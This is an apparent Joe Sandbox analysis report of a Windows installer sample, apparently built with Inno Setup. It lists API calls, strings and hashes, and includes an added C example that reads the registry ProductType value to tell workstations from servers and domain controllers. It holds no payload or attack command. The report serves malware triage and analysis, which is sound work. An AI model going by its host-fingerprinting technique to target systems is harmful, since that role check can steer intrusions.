• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Cursor$Load
• String ID: $ $Internal error: Item already expanding
• API String ID: 1675784387-1948079669
• Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
• Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
• Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
• Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
Uniqueness

Uniqueness Score: -1.00%

APIs
• WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: PrivateProfileStringWrite
• String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
• API String ID: 390214022-3304407042
• Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
• Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
• Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
• Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
• SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
• GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ClassInfoLongMessageSendWindow
• String ID: COMBOBOX$Inno Setup: Language
• API String ID: 3391662889-4234151509
• Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
• Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
• Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
  • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
  • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: InfoLocale$DefaultSystem
• String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
• API String ID: 1044490935-665933166
• Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
• Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
• Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
• InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
  • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
• InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
  • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
• InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                                                                                                                                  • String ID: ,$?
                                                                                                                                                                                                                                  • API String ID: 2359071979-2308483597
                                                                                                                                                                                                                                  • Opcode ID: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                                                                                                                                                  • Instruction ID: ecf66c9774bccec907b621c371347452b74b7622051e058d8a4a73451c3e974f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4986dcd06abefbee5f666d79fc26290c702fe8a84b14e195092edf3558bd7871
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7510674A00245ABDB10EF6ADC816EA7BF9AF09304B11857BF904E73A6D738DD41CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF28
                                                                                                                                                                                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF37
                                                                                                                                                                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF88
                                                                                                                                                                                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF96
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041BF9F
                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 0041BFA8
                                                                                                                                                                                                                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFC5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1030595962-0
                                                                                                                                                                                                                                  • Opcode ID: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                                                                                                                                                  • Instruction ID: 74cae3b7aa7aab4ce12a2fbd062d204c5c4082198076ec6df892ad84fd278e80
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dabea464bc85c36b4411cc83672e19ff5768c85fc4c65aec36842f1966395034
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A510671A002199FCB10DFA9C9819EEB7F9EF48314B11416AF914E7395D738AD41CB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEFE
                                                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000026), ref: 0041CF1D
                                                                                                                                                                                                                                  • SelectPalette.GDI32(?,?,00000001), ref: 0041CF83
                                                                                                                                                                                                                                  • RealizePalette.GDI32(?), ref: 0041CF92
                                                                                                                                                                                                                                  • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFFC
                                                                                                                                                                                                                                  • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D03A
                                                                                                                                                                                                                                  • SelectPalette.GDI32(?,?,00000001), ref: 0041D05F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: PaletteStretch$Select$BitsCapsDeviceModeRealize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2222416421-0
                                                                                                                                                                                                                                  • Opcode ID: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                                                                                                                                                  • Instruction ID: 4b814cf558339e083a7fb5ccd56fb4ffad9fd0a27a4bfdacf16c2dd2476febac
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5be0e4e6833feb243a8d388dd1011de92277052336d3d318ec39d49e9b6efc72
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2515EB0604200AFDB14DFA8C985F9BBBE9EF08304F10459AB549DB292C778ED81CB58
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,?,?), ref: 0045732E
                                                                                                                                                                                                                                    • Part of subcall function 0042427C: GetWindowTextA.USER32(?,?,00000100), ref: 0042429C
                                                                                                                                                                                                                                    • Part of subcall function 0041EEA4: GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                                                                                                                                    • Part of subcall function 0041EEA4: EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                                                                                                                                    • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00457395
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 004573B3
                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 004573BC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$TextThreadWindow$CurrentDispatchEnumSendTranslateWindows
                                                                                                                                                                                                                                  • String ID: [Paused]
                                                                                                                                                                                                                                  • API String ID: 1007367021-4230553315
                                                                                                                                                                                                                                  • Opcode ID: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                                                                                                                                  • Instruction ID: a72840e20965590be0df7748d4dcd1bfe023db3bc5775872eefead19b10ec59e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 138259db96aaba9c66cb09bcf6582550d327018b684ee04c4d651f5f89e9d65e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 633175319082449ADB11DBB9EC81B9E7FB8EF49314F5540B7EC00E7292D73C9909DB69
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCursor.USER32(00000000,0046B55F), ref: 0046B4DC
                                                                                                                                                                                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0046B4EA
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4F0
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B4FA
                                                                                                                                                                                                                                  • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B55F), ref: 0046B500
                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Cursor$LoadSleep
• String ID: CheckPassword

APIs
  • Part of subcall function 00477B94: GetWindowThreadProcessId.USER32(00000000), ref: 00477B9C
  • Part of subcall function 00477B94: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477C93,0049C0A8,00000000), ref: 00477BAF
  • Part of subcall function 00477B94: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477BB5
• SendMessageA.USER32(00000000,0000004A,00000000,00478026), ref: 00477CA1
• GetTickCount.KERNEL32 ref: 00477CE6
• GetTickCount.KERNEL32 ref: 00477CF0
• MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 00477D45
Strings
• CallSpawnServer: Unexpected response: $%x, xrefs: 00477CD6
• CallSpawnServer: Unexpected status: %d, xrefs: 00477D2E
Similarity
• API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
• String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d

APIs
• GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045983F
Strings
• Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045984A
• .NET Framework CreateAssemblyCache function failed, xrefs: 00459862
• Failed to load .NET Framework DLL "%s", xrefs: 00459824
• Fusion.dll, xrefs: 004597DF
• CreateAssemblyCache, xrefs: 00459836
Similarity
• API ID: AddressProc
• String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll

APIs
  • Part of subcall function 0041C048: GetObjectA.GDI32(?,00000018), ref: 0041C055
• GetFocus.USER32 ref: 0041C168
• GetDC.USER32(?), ref: 0041C174
• SelectPalette.GDI32(?,?,00000000), ref: 0041C195
• RealizePalette.GDI32(?), ref: 0041C1A1
• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B8
• SelectPalette.GDI32(?,00000000,00000000), ref: 0041C1E0
• ReleaseDC.USER32(?,?), ref: 0041C1ED
Similarity
• API ID: Palette$Select$BitsFocusObjectRealizeRelease
• String ID:

APIs
• GetSystemMetrics.USER32(0000000E), ref: 00418C70
• GetSystemMetrics.USER32(0000000D), ref: 00418C78
• 6F552980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C7E
  • Part of subcall function 004107F8: 6F54C400.COMCTL32(0049B628,000000FF,00000000,00418CAC,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004107FC
• 6F5BCB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CCE
• 6F5BC740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD9
• 6F5BCB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000), ref: 00418CEC
• 6F550860.COMCTL32(0049B628,00418D0F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D08,?,00000000,0000000D,00000000,0000000E), ref: 00418D02
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MetricsSystem$C400C740F550860F552980
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1828538299-0
                                                                                                                                                                                                                                  • Opcode ID: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                                                                                                                                  • Instruction ID: f48c8f8e6a400555c090207229051c9eae11b8a9b20c4da93df477ea8fa1a9e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e2c7fe5230f8d2f143d47c0d6a7892a097693e1c100db4317caf46c6149257f7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6B112475744204BBDB50EBA9EC82FAD73F8DB08704F504066B514EB2C1DAB9AD808759
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00483D24), ref: 00483D09
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseOpen
• String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
• API String ID: 47109696-2530820420
• Opcode ID: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
• Instruction ID: 212569cff1cfb7858b589fbdbabdc9c693f1f7cc945fcf11155ec0ddb5f1f406
• Opcode Fuzzy Hash: e1bcbbbaaee85d585434023fd650e6813b785c41e8fbc068ac73575afb55ee56
• Instruction Fuzzy Hash: CC117C30704244AADB10FF65D862B5E7BF9DB45B05F618877A800E7282EB78AE05875C
Uniqueness
• Uniqueness Score: -1.00%
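
The function above pairs RegOpenKeyExA/RegCloseKey with the strings ProductOptions, ProductType, WinNT, ServerNT and LanmanNT. Those are the values of HKLM\System\CurrentControlSet\Control\ProductOptions\ProductType (0x80000002 in the call list is HKEY_LOCAL_MACHINE), and reading that value is the standard way to tell a workstation (WinNT) from a member or standalone server (ServerNT) or a domain controller (LanmanNT). The block below is an added example, not code recovered from the sample: it performs that query on Windows and classifies the result. The listing does not show which value-query API the sample uses; the example assumes RegQueryValueExA. The enum, the function names and the case-insensitive comparison are this example's own choices, and on non-Windows builds the registry read is stubbed out so that only the classifier runs.

```c
#include <stdio.h>
#include <string.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Added example. The three ProductType values are the ones the sample's
 * strings reference; the enum and function names are this example's own,
 * not identifiers recovered from the binary. */
typedef enum {
    PRODUCT_UNKNOWN = 0,
    PRODUCT_WORKSTATION,       /* ProductType == "WinNT" */
    PRODUCT_SERVER,            /* ProductType == "ServerNT" */
    PRODUCT_DOMAIN_CONTROLLER  /* ProductType == "LanmanNT" */
} product_kind;

/* ASCII case-insensitive equality, so "winnt" and "WinNT" classify alike. */
static int ascii_ieq(const char *a, const char *b)
{
    for (; *a != '\0' && *b != '\0'; a++, b++) {
        int ca = (unsigned char)*a, cb = (unsigned char)*b;
        if (ca >= 'A' && ca <= 'Z') ca += 'a' - 'A';
        if (cb >= 'A' && cb <= 'Z') cb += 'a' - 'A';
        if (ca != cb) return 0;
    }
    return *a == *b;
}

/* Maps a ProductType string to a host role. Unknown or NULL input is
 * reported as PRODUCT_UNKNOWN rather than guessed. */
product_kind classify_product_type(const char *value)
{
    if (value == NULL) return PRODUCT_UNKNOWN;
    if (ascii_ieq(value, "WinNT"))    return PRODUCT_WORKSTATION;
    if (ascii_ieq(value, "ServerNT")) return PRODUCT_SERVER;
    if (ascii_ieq(value, "LanmanNT")) return PRODUCT_DOMAIN_CONTROLLER;
    return PRODUCT_UNKNOWN;
}

/* Reads HKLM\System\CurrentControlSet\Control\ProductOptions\ProductType.
 * Uses the RegOpenKeyExA / RegCloseKey pair from the listing plus
 * RegQueryValueExA (an assumption; the listing does not show the query).
 * Returns 1 and a NUL-terminated string on success, 0 on failure or on
 * non-Windows builds, where the registry read is stubbed out. */
int read_product_type(char *buf, size_t len)
{
    if (buf == NULL || len == 0) return 0;
    buf[0] = '\0';
#ifdef _WIN32
    HKEY key;
    DWORD type = 0, size = (DWORD)len;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE,
                      "System\\CurrentControlSet\\Control\\ProductOptions",
                      0, KEY_QUERY_VALUE, &key) != ERROR_SUCCESS)
        return 0;
    LONG rc = RegQueryValueExA(key, "ProductType", NULL, &type, (LPBYTE)buf, &size);
    RegCloseKey(key);                         /* always release the handle */
    if (rc != ERROR_SUCCESS || type != REG_SZ) return 0;
    if (size >= len) size = (DWORD)len - 1;   /* registry data may lack a NUL */
    buf[size] = '\0';
    return 1;
#else
    (void)len;
    return 0;
#endif
}

static const char *kind_name(product_kind k)
{
    switch (k) {
    case PRODUCT_WORKSTATION:       return "workstation";
    case PRODUCT_SERVER:            return "server";
    case PRODUCT_DOMAIN_CONTROLLER: return "domain controller";
    default:                        return "unknown";
    }
}

int main(void)
{
    char value[64];
    if (read_product_type(value, sizeof value))
        printf("ProductType=%s -> %s\n", value, kind_name(classify_product_type(value)));
    else
        printf("ProductType not readable on this host (not Windows, or the query failed)\n");
    return 0;
}
```

When triaging a sample, seeing this key read alongside the three role strings is a hint that the code branches on host role; whether the sample uses the result for targeting, installer logic or something else is not established by the call list alone.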

APIs
• SelectObject.GDI32(00000000,?), ref: 0041B470
• SelectObject.GDI32(?,00000000), ref: 0041B47F
• StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4AB
• SelectObject.GDI32(00000000,00000000), ref: 0041B4B9
• SelectObject.GDI32(?,00000000), ref: 0041B4C7
• DeleteDC.GDI32(00000000), ref: 0041B4D0
• DeleteDC.GDI32(?), ref: 0041B4D9
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
